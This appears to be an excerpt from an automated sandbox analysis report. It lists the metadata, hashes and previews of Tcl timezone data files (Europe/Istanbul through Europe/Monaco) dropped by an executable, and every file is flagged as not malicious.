                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):3683
                                                                                                                                                                                                                              Entropy (8bit):3.814835316757376
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:Qi0p05zvSPBUUl0ZFzo4ay0CREDcxn6nH78BV0QbCgkCPviiM0H7hdli80+j7x9L:Qiq66OFEIFMssCfMsXV3heM2MRlA0
                                                                                                                                                                                                                              MD5:A8256656B971F58CB991BC270BF93B26
                                                                                                                                                                                                                              SHA1:189796E1B8E29A7A7B8B0E143DD9B44BAF217AB2
                                                                                                                                                                                                                              SHA-256:08061A80FC0F1EF375EEFE784EACDF0812E289FD67E8613BDEC36209985CA1D7
                                                                                                                                                                                                                              SHA-512:1F11308B5BAC1F3DB75CAC7322BBEA6E51C6B4A2A3450F1DB84DE6AA127F0F1BAA7DAB409FAF1288C100BDA77DA6FA1C6E3C0BA962F9406D1445D7C9E2AA3A60
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Europe/Istanbul) {.. {-9223372036854775808 6952 0 LMT}.. {-2840147752 7016 0 IMT}.. {-1869875816 7200 0 EET}.. {-1693706400 10800 1 EEST}.. {-1680490800 7200 0 EET}.. {-1570413600 10800 1 EEST}.. {-1552186800 7200 0 EET}.. {-1538359200 10800 1 EEST}.. {-1522551600 7200 0 EET}.. {-1507514400 10800 1 EEST}.. {-1490583600 7200 0 EET}.. {-1440208800 10800 1 EEST}.. {-1428030000 7200 0 EET}.. {-1409709600 10800 1 EEST}.. {-1396494000 7200 0 EET}.. {-931053600 10800 1 EEST}.. {-922676400 7200 0 EET}.. {-917834400 10800 1 EEST}.. {-892436400 7200 0 EET}.. {-875844000 10800 1 EEST}.. {-764737200 7200 0 EET}.. {-744343200 10800 1 EEST}.. {-733806000 7200 0 EET}.. {-716436000 10800 1 EEST}.. {-701924400 7200 0 EET}.. {-684986400 10800 1 EEST}.. {-670474800 7200 0 EET}.. {-654141600 10800 1 EEST}.. {-639025200 7200 0 EET}.. {-622087200 10800 1 EEST}.
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):181
                                                                                                                                                                                                                              Entropy (8bit):4.8801202136140915
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqxVxKL823vXHAIgoqyKL8H6RL/yQap6cEBx/yQavKLS:SlSWB9vsM3ymvKA2PHAIgovKAH6N/yzx
                                                                                                                                                                                                                              MD5:FE10770868A75F4F8D76C5E23D99AA81
                                                                                                                                                                                                                              SHA1:30AC768BA47AF7A53831F5142B58ECEC41933621
                                                                                                                                                                                                                              SHA-256:97EB33915ED7C9C34144F8F42357FAB2262B3CD45287F3CFFD26C33D65F7651E
                                                                                                                                                                                                                              SHA-512:1D82DF45AB0CCDFBFAD0431C668794996E01776800F34DD4131C5287D37291657A749D497AA5B0AB81CAFF3190896633FBFF456BFFEB7E93A3420AA841E54842
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Europe/London)]} {.. LoadTimeZoneFile Europe/London..}..set TZData(:Europe/Jersey) $TZData(:Europe/London)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2512
                                                                                                                                                                                                                              Entropy (8bit):3.941165221943348
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:coNlj+X2uxhuHJkw0QqXknzaVV04v3TfdGY3kNmneVuNlh000sGpdh:coN9+1EpkwCXkSV3A8qc0
                                                                                                                                                                                                                              MD5:104CCB93300F40BAF8F4D7CC882EFC05
                                                                                                                                                                                                                              SHA1:EA83F3C3791BD6F083844939DC405B248E738FE3
                                                                                                                                                                                                                              SHA-256:2387D26DF5429DF9867F42F7D4F872DC146643B4B3CC57DA7298C18561DE8BFE
                                                                                                                                                                                                                              SHA-512:12724C5BBEE0835626A98B66BF55C3DF1311F07018C70D76FC5C50E7E7BA5C4A9F064D9EDC376CC3B06C4FFFECA3FAF5B66948615A03DFECA7C361E326D950EA
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Europe/Kaliningrad) {.. {-9223372036854775808 4920 0 LMT}.. {-2422056120 3600 0 CET}.. {-1693706400 7200 1 CEST}.. {-1680483600 3600 0 CET}.. {-1663455600 7200 1 CEST}.. {-1650150000 3600 0 CET}.. {-1632006000 7200 1 CEST}.. {-1618700400 3600 0 CET}.. {-938905200 7200 1 CEST}.. {-857257200 3600 0 CET}.. {-844556400 7200 1 CEST}.. {-828226800 3600 0 CET}.. {-812502000 7200 1 CEST}.. {-796777200 3600 0 CET}.. {-781052400 7200 1 CEST}.. {-780368400 7200 0 EET}.. {-778730400 10800 1 EEST}.. {-762663600 7200 0 EET}.. {-749095200 10800 0 MSD}.. {354920400 14400 1 MSD}.. {370728000 10800 0 MSK}.. {386456400 14400 1 MSD}.. {402264000 10800 0 MSK}.. {417992400 14400 1 MSD}.. {433800000 10800 0 MSK}.. {449614800 14400 1 MSD}.. {465346800 10800 0 MSK}.. {481071600 14400 1 MSD}.. {496796400 10800 0 MSK}.. {512521200 14400 1 MSD}.. {528246000 10800
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):173
                                                                                                                                                                                                                              Entropy (8bit):4.970386708540243
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqxV2cvXHAIgoq1csFARL/yQaoM2EBUQaocqn:SlSWB9vsM3ym5HAIgoiAN/yOEBUC
                                                                                                                                                                                                                              MD5:74ACF46A3248341CFD84B1592F884A8F
                                                                                                                                                                                                                              SHA1:888FBB54381A1B5BC19E65AF38A1913635A8E7E4
                                                                                                                                                                                                                              SHA-256:05C55F87182F0D5D3E8E6C1F9164EDDBDB8035146A0955C04283BC1347D45B30
                                                                                                                                                                                                                              SHA-512:21A752390E023CBD582BC43865D43458B44B036299A2373948269196071742ED7EB6067DD9A288F3A15E808B452FE4192750FAE813F70738FAB0C866219D57CB
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Europe/Kyiv)]} {.. LoadTimeZoneFile Europe/Kyiv..}..set TZData(:Europe/Kiev) $TZData(:Europe/Kyiv)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2029
                                                                                                                                                                                                                              Entropy (8bit):3.668326642402654
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:FFvCAs6kKR6aQmF1cSNWrI+AjXgV/Ap40FjDM:FhCAs6kC6aZF1cSN4I+AjXgV/ApDFjDM
                                                                                                                                                                                                                              MD5:57BB199152815B12FE4491C92FE25186
                                                                                                                                                                                                                              SHA1:7BC5ECDE9EFADE812AF40CB92CCE5323FB57C78D
                                                                                                                                                                                                                              SHA-256:60884D4B8B17A9AB8FB5697DA95F62E570755348109C661D783D56CD047BBE9E
                                                                                                                                                                                                                              SHA-512:2043FDBA860E8F6578F7E26A80C7787B82C7D15188327923EC36D153FDF9BEEAE063012ACE4309B76DB9DBA2DFFB7404DE370BA85023CCE93159FCAD3B9B92B5
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Europe/Kirov) {.. {-9223372036854775808 11928 0 LMT}.. {-1593820800 10800 0 +03}.. {-1247540400 14400 0 +05}.. {354916800 18000 1 +05}.. {370724400 14400 0 +04}.. {386452800 18000 1 +05}.. {402260400 14400 0 +04}.. {417988800 18000 1 +05}.. {433796400 14400 0 +04}.. {449611200 18000 1 +05}.. {465343200 14400 0 +04}.. {481068000 18000 1 +05}.. {496792800 14400 0 +04}.. {512517600 18000 1 +05}.. {528242400 14400 0 +04}.. {543967200 18000 1 +05}.. {559692000 14400 0 +04}.. {575416800 18000 1 +05}.. {591141600 14400 0 +04}.. {606866400 10800 0 +04}.. {606870000 14400 1 +04}.. {622594800 10800 0 +03}.. {638319600 14400 1 +04}.. {654649200 10800 0 +03}.. {670374000 14400 0 +04}.. {701820000 10800 0 +04}.. {701823600 14400 1 +04}.. {717548400 10800 0 +03}.. {733273200 14400 1 +04}.. {748998000 10800 0 +03}.. {764722800 14400 1 +04}.. {78044
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):7455
                                                                                                                                                                                                                              Entropy (8bit):3.7624983280224953
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:vC1LyEpkv8V3MpaNlKkUpvBeRF+iDlKSdkwSMTHkB2vwz59F06Kgr/y/rYjlBKb4:vC9VW0bivBeRF+W35Syrwl9h5j
                                                                                                                                                                                                                              MD5:F37C7529B53C4C158341AF90F80C3A11
                                                                                                                                                                                                                              SHA1:210650A882350D35C72A934749F276C58C572DFA
                                                                                                                                                                                                                              SHA-256:591264F69DB19DDCDC90E704525E2D3D3984117B710F482F19DA8F88628EE6A7
                                                                                                                                                                                                                              SHA-512:F23B0C5251EB7418A1C80344AB7623D2A0197E681E3B7D152E416187BF66DE09A7A60A65F8ED6A810272CF0C253D63684F08AF594A8C22ABEA89E3BBADC8F0A0
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Europe/Kyiv) {.. {-9223372036854775808 7324 0 LMT}.. {-2840148124 7324 0 KMT}.. {-1441159324 7200 0 EET}.. {-1247536800 10800 0 MSK}.. {-892522800 3600 0 CET}.. {-857257200 3600 0 CET}.. {-844556400 7200 1 CEST}.. {-828226800 3600 0 CET}.. {-825382800 10800 0 MSD}.. {354920400 14400 1 MSD}.. {370728000 10800 0 MSK}.. {386456400 14400 1 MSD}.. {402264000 10800 0 MSK}.. {417992400 14400 1 MSD}.. {433800000 10800 0 MSK}.. {449614800 14400 1 MSD}.. {465346800 10800 0 MSK}.. {481071600 14400 1 MSD}.. {496796400 10800 0 MSK}.. {512521200 14400 1 MSD}.. {528246000 10800 0 MSK}.. {543970800 14400 1 MSD}.. {559695600 10800 0 MSK}.. {575420400 14400 1 MSD}.. {591145200 10800 0 MSK}.. {606870000 14400 1 MSD}.. {622594800 10800 0 MSK}.. {638319600 14400 1 MSD}.. {646786800 10800 1 EEST}.. {686102400 7200 0 EET}.. {701827200 10800 1 EEST}.. {7175
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):9878
                                                                                                                                                                                                                              Entropy (8bit):3.8275310275285723
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:j76abXsyZLEjx82YbtIaFF1w0us4qE3+sSGjT:j77bXsyZLEjx82atysLE3+sSGjT
                                                                                                                                                                                                                              MD5:0DA331C2A815739E6758797BD24554EA
                                                                                                                                                                                                                              SHA1:3829C441E908BEFDC4ED6AB65FD4ACD0C97D5E1B
                                                                                                                                                                                                                              SHA-256:9FAC9812411F88014779D34722F3E0D2750E45BF21595DF1AE14CB9CCFD3F33F
                                                                                                                                                                                                                              SHA-512:FEBBA05F64AC1F3066AF6351493DD89768154FD171D447503DAEDB90D16858BEDBCE4A74E24AC0C37B5FF191692AF44AADDE4A92E752F88C48DA646352AD9A0B
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Europe/Lisbon) {.. {-9223372036854775808 -2205 0 LMT}.. {-2713908195 -2205 0 LMT}.. {-1830384000 0 0 WET}.. {-1689555600 3600 1 WEST}.. {-1677801600 0 0 WET}.. {-1667437200 3600 1 WEST}.. {-1647738000 0 0 WET}.. {-1635814800 3600 1 WEST}.. {-1616202000 0 0 WET}.. {-1604365200 3600 1 WEST}.. {-1584666000 0 0 WET}.. {-1572742800 3600 1 WEST}.. {-1553043600 0 0 WET}.. {-1541206800 3600 1 WEST}.. {-1521507600 0 0 WET}.. {-1442451600 3600 1 WEST}.. {-1426813200 0 0 WET}.. {-1379293200 3600 1 WEST}.. {-1364778000 0 0 WET}.. {-1348448400 3600 1 WEST}.. {-1333328400 0 0 WET}.. {-1316394000 3600 1 WEST}.. {-1301274000 0 0 WET}.. {-1284339600 3600 1 WEST}.. {-1269824400 0 0 WET}.. {-1221440400 3600 1 WEST}.. {-1206925200 0 0 WET}.. {-1191200400 3600 1 WEST}.. {-1175475600 0 0 WET}.. {-1127696400 3600 1 WEST}.. {-1111971600 0 0 WET}.. {-1096851
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):190
                                                                                                                                                                                                                              Entropy (8bit):4.948438246006353
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqxV/sUE2tovXHAIgoq8sUE2oAovRL/yQavPSJ5Qahs0:SlSWB9vsM3ymhrE2tSHAIgohrE2LovNl
                                                                                                                                                                                                                              MD5:56C6C95484FEAF9BAF755683E7417B58
                                                                                                                                                                                                                              SHA1:A43176BEBC5B4D7144A7E1109E0AAEFD95C21EC6
                                                                                                                                                                                                                              SHA-256:713A842197516D618F2D86977262542A1CA334D7DF6026539FA2F2980DBF4CD3
                                                                                                                                                                                                                              SHA-512:566B6DF2D76A8A4D3405C4785C7A471A23D65CD8838831BD0DEDF5BF194E8A3B304CA9920CB4A8EC9D6CD60EAA9BE0335E38D9547A4D23C7E4E5E5A39A09DDAC
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Europe/Belgrade)]} {.. LoadTimeZoneFile Europe/Belgrade..}..set TZData(:Europe/Ljubljana) $TZData(:Europe/Belgrade)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):10211
                                                                                                                                                                                                                              Entropy (8bit):3.826887992237191
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:GNoCvTZtcf80KYiK3BG0Myj9TYQOeMAwbccM0Fp:GNNTZtcf15iOBG08eNwbccM0Fp
                                                                                                                                                                                                                              MD5:0625C99E16D3C956DED1C0C0F867DEC3
                                                                                                                                                                                                                              SHA1:6ACDF0DB619B63E21EC89046B9320A85FBD3397A
                                                                                                                                                                                                                              SHA-256:D04C4E25DF4DE1C1CFE1EF84B3B6DD746CF08A271AB0958F22C7D580A3ED10E6
                                                                                                                                                                                                                              SHA-512:07AC42F0635DF01CC0AFD13F9668B143D4943BA0E4C377D254B5AF034D9DDBAB77BA813187E9AB73D2EEAD86EBAA26DC15599FD74FC82EEF287F5A6AB9C01635
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Europe/London) {.. {-9223372036854775808 -75 0 LMT}.. {-3852662325 0 0 GMT}.. {-1691964000 3600 1 BST}.. {-1680472800 0 0 GMT}.. {-1664143200 3600 1 BST}.. {-1650146400 0 0 GMT}.. {-1633903200 3600 1 BST}.. {-1617487200 0 0 GMT}.. {-1601848800 3600 1 BST}.. {-1586037600 0 0 GMT}.. {-1570399200 3600 1 BST}.. {-1552168800 0 0 GMT}.. {-1538344800 3600 1 BST}.. {-1522533600 0 0 GMT}.. {-1507500000 3600 1 BST}.. {-1490565600 0 0 GMT}.. {-1473631200 3600 1 BST}.. {-1460930400 0 0 GMT}.. {-1442786400 3600 1 BST}.. {-1428876000 0 0 GMT}.. {-1410732000 3600 1 BST}.. {-1396216800 0 0 GMT}.. {-1379282400 3600 1 BST}.. {-1364767200 0 0 GMT}.. {-1348437600 3600 1 BST}.. {-1333317600 0 0 GMT}.. {-1315778400 3600 1 BST}.. {-1301263200 0 0 GMT}.. {-1284328800 3600 1 BST}.. {-1269813600 0 0 GMT}.. {-1253484000 3600 1 BST}.. {-1238364000 0 0 GMT}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):191
                                                                                                                                                                                                                              Entropy (8bit):4.920751023999728
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqxV/So3vXHAIgoq82yHRL/yQavQLHKQX9J8QahCv:SlSWB9vsM3ymhS2HAIgoh26N/y1QzKQt
                                                                                                                                                                                                                              MD5:E4A8C25756D6C5D2073A51D2B54E3A0C
                                                                                                                                                                                                                              SHA1:4A24667ADC9BD31E8CB298BE3787C12301C3F1C8
                                                                                                                                                                                                                              SHA-256:8C0486A5B235E8B01069420976E1B8D08D77A4BEF587203AF1B68D7B5333546E
                                                                                                                                                                                                                              SHA-512:F3593C3B75C9DA931FB39BC2054EB9691C3A544A74F871425169C3244040D6D060510741FE1E352A1E59F53E5A585307D434A0D7C9D159D065717E78C807787C
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Europe/Brussels)]} {.. LoadTimeZoneFile Europe/Brussels..}..set TZData(:Europe/Luxembourg) $TZData(:Europe/Brussels)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):8517
                                                                                                                                                                                                                              Entropy (8bit):3.8326167134909177
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:k5m01LdXKc0TJp+bwS274elPiIEtzsFpMbFNBwA3ybuNTjrjBDmE0DmiTcoYdNOn:+DaNVLSs41sFpM5vwA6Efv03TBZLl
                                                                                                                                                                                                                              MD5:63263380F57B756A1DFA3796E4188CD3
                                                                                                                                                                                                                              SHA1:8EEE707AC4FEA1C098C81AC2D289A46239121A5E
                                                                                                                                                                                                                              SHA-256:5337C9843C56DEEC6B91C4468C76EC1C896E80421B72B583B69DE5579063E09A
                                                                                                                                                                                                                              SHA-512:ACA4830020715C471741E27EB2292ACF002D2CD7EDCD1061978B64967EB447F61AA095F960D8A75A01B9B87558D83FF409F30BDACA83E063024F1E2381FA64C4
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Europe/Madrid) {.. {-9223372036854775808 -884 0 LMT}.. {-2177452800 0 0 WET}.. {-1631926800 3600 1 WEST}.. {-1616889600 0 0 WET}.. {-1601168400 3600 1 WEST}.. {-1585353600 0 0 WET}.. {-1442451600 3600 1 WEST}.. {-1427673600 0 0 WET}.. {-1379293200 3600 1 WEST}.. {-1364774400 0 0 WET}.. {-1348448400 3600 1 WEST}.. {-1333324800 0 0 WET}.. {-1316390400 3600 1 WEST}.. {-1301270400 0 0 WET}.. {-1284339600 3600 1 WEST}.. {-1269820800 0 0 WET}.. {-1026954000 3600 1 WEST}.. {-1017619200 0 0 WET}.. {-1001898000 3600 1 WEST}.. {-999482400 7200 1 WEMT}.. {-986090400 3600 1 WEST}.. {-954115200 0 0 WET}.. {-940208400 3600 0 CET}.. {-873079200 7200 1 CEST}.. {-862621200 3600 0 CET}.. {-842839200 7200 1 CEST}.. {-828320400 3600 0 CET}.. {-811389600 7200 1 CEST}.. {-796870800 3600 0 CET}.. {-779940000 7200 1 CEST}.. {-765421200 3600 0 CET}.. {-74849
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):8724
                                                                                                                                                                                                                              Entropy (8bit):3.816380386871747
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:KAGvi2GmkwwnpH74elPiIEtzsFpMbFNBwA3ybuNTjrjBDmE0DmiTcoYdNOMCsyZN:KLsww141sFpM5vwA6Efv03TBZLl
                                                                                                                                                                                                                              MD5:9B09D6EED8F23BAFFB62929C0115E852
                                                                                                                                                                                                                              SHA1:4AEF15333C73C2836C09D818FD0E20440D7C4780
                                                                                                                                                                                                                              SHA-256:C5C240BAAECE8235D1FBDD251C1A67CB2D2FC8195DD5BBE37FF9CFF0445FCDA2
                                                                                                                                                                                                                              SHA-512:43AA3492BD335A290C6EFEE275B47EA18E544199E37A9BBAE2E350D42BDFF42F0E9ED461A4BB1824CA33F84A90D4060906844A3E22DA49C9821E4CB460832D6E
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Europe/Malta) {.. {-9223372036854775808 3484 0 LMT}.. {-2403478684 3600 0 CET}.. {-1690765200 7200 1 CEST}.. {-1680487200 3600 0 CET}.. {-1664758800 7200 1 CEST}.. {-1648951200 3600 0 CET}.. {-1635123600 7200 1 CEST}.. {-1616896800 3600 0 CET}.. {-1604278800 7200 1 CEST}.. {-1585533600 3600 0 CET}.. {-1571014800 7200 1 CEST}.. {-1555293600 3600 0 CET}.. {-932432400 7200 1 CEST}.. {-857257200 3600 0 CET}.. {-844556400 7200 1 CEST}.. {-828226800 3600 0 CET}.. {-812588400 7200 1 CEST}.. {-798073200 3600 0 CET}.. {-781052400 7200 1 CEST}.. {-766717200 3600 0 CET}.. {-750898800 7200 1 CEST}.. {-733359600 3600 0 CET}.. {-719456400 7200 1 CEST}.. {-701917200 3600 0 CET}.. {-689209200 7200 1 CEST}.. {-670460400 3600 0 CET}.. {-114051600 7200 1 CEST}.. {-103168800 3600 0 CET}.. {-81997200 7200 1 CEST}.. {-71715600 3600 0 CET}.. {-50547600 7200 1
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):190
                                                                                                                                                                                                                              Entropy (8bit):4.959733196757503
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqxV1AYKjG5XHAIgoq2AYKjo0ARL/yQausWILMFJ8QaC:SlSWB9vsM3ymrAdjGJHAIgorAdjo0ANn
                                                                                                                                                                                                                              MD5:C1844961691214F6E6DF6487788A7758
                                                                                                                                                                                                                              SHA1:6D08E9FB7B8602A80622148BFACD9676F45F0E2B
                                                                                                                                                                                                                              SHA-256:6136C3CFA4A767E7C9DDA23A283AD98B72E9868F192E6A8E3BFE6396F6989BD1
                                                                                                                                                                                                                              SHA-512:B2D1EA51AC5B34792AC02820A9D60FD41F3B91AB6505896476FCB0DC339B8DC1DE9E2C89A7627F69E16247661AE8040D789FFD2F8F1CD59F243B57C4845B450F
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Europe/Helsinki)]} {.. LoadTimeZoneFile Europe/Helsinki..}..set TZData(:Europe/Mariehamn) $TZData(:Europe/Helsinki)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2177
                                                                                                                                                                                                                              Entropy (8bit):3.9354590900153172
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:K8cVnR7xhuHJkminzaVV04v3TfdGY3kNmneVuNlh000sGpde:5mnRtEpkmiSV3A8qcN
                                                                                                                                                                                                                              MD5:9C10EAE9FA0DE192C5FD4F76E12606F0
                                                                                                                                                                                                                              SHA1:AFD5650410EC3E6ED564A8B2ABF91709D090B4AD
                                                                                                                                                                                                                              SHA-256:8C95EA696EA578DEF726502AC181AF475A676030878F56B4E2D667757BBD1C49
                                                                                                                                                                                                                              SHA-512:3B9ED6B68858485B9A46A0863B7D9D3C1E4C5BBA269457F24A9A12C274F0F9B35E63D8C25EB53E7200DB57DD35ACCB7FD7D8AB005FEE2C4D7FC6E72E8CF57194
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Europe/Minsk) {.. {-9223372036854775808 6616 0 LMT}.. {-2840147416 6600 0 MMT}.. {-1441158600 7200 0 EET}.. {-1247536800 10800 0 MSK}.. {-899780400 3600 0 CET}.. {-857257200 3600 0 CET}.. {-844556400 7200 1 CEST}.. {-828226800 3600 0 CET}.. {-812502000 7200 1 CEST}.. {-804646800 10800 0 MSD}.. {354920400 14400 1 MSD}.. {370728000 10800 0 MSK}.. {386456400 14400 1 MSD}.. {402264000 10800 0 MSK}.. {417992400 14400 1 MSD}.. {433800000 10800 0 MSK}.. {449614800 14400 1 MSD}.. {465346800 10800 0 MSK}.. {481071600 14400 1 MSD}.. {496796400 10800 0 MSK}.. {512521200 14400 1 MSD}.. {528246000 10800 0 MSK}.. {543970800 14400 1 MSD}.. {559695600 10800 0 MSK}.. {575420400 14400 1 MSD}.. {591145200 10800 0 MSK}.. {606870000 14400 1 MSD}.. {622594800 10800 0 MSK}.. {631141200 10800 0 MSK}.. {670374000 7200 0 EEMMTT}.. {670377600 10800 1 EEST}.. {
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):178
                                                                                                                                                                                                                              Entropy (8bit):4.9089012087310095
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqxVtEXc4o3vXHAIgoquEXeRL/yQauPMFBx6QazEXcov:SlSWB9vsM3ymzESPHAIgozEON/ySRpEB
                                                                                                                                                                                                                              MD5:2015CF8BBEEE12AF0D9C82FD2E246C72
                                                                                                                                                                                                                              SHA1:062BFFBB266C3EBB5776A509DDB7A6044C82B864
                                                                                                                                                                                                                              SHA-256:9DF16BB1C26100635DC4CB1DF409B0FA7B139C22BF09574ED337EE244CA3C546
                                                                                                                                                                                                                              SHA-512:FD3479588D4F3B84CF6C8B8A5DB1AB3BFA0A87CA2FFADB4FEBBBB25711C77963BE7CD0D1DA5ED985D729F39C5B44E8CBD429F1E2DA813DF26272D66CAE4F425A
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Europe/Paris)]} {.. LoadTimeZoneFile Europe/Paris..}..set TZData(:Europe/Monaco) $TZData(:Europe/Paris)..
